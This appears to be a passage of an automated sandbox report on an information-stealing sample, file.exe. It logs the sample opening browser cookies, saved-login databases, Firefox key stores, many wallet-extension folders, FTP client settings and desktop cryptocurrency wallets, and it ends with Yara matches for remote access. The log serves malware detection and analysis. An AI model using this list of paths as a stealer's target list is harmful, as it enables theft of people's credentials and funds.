Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NWCXBPIUYI
Source: C:\Users\user\Desktop\file.exe Directory queried: C:\Users\user\Documents\NYMMPCEIMA
Source: Yara match File source: 00000000.00000003.2129877489.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2129358643.00000000017E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 1400, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP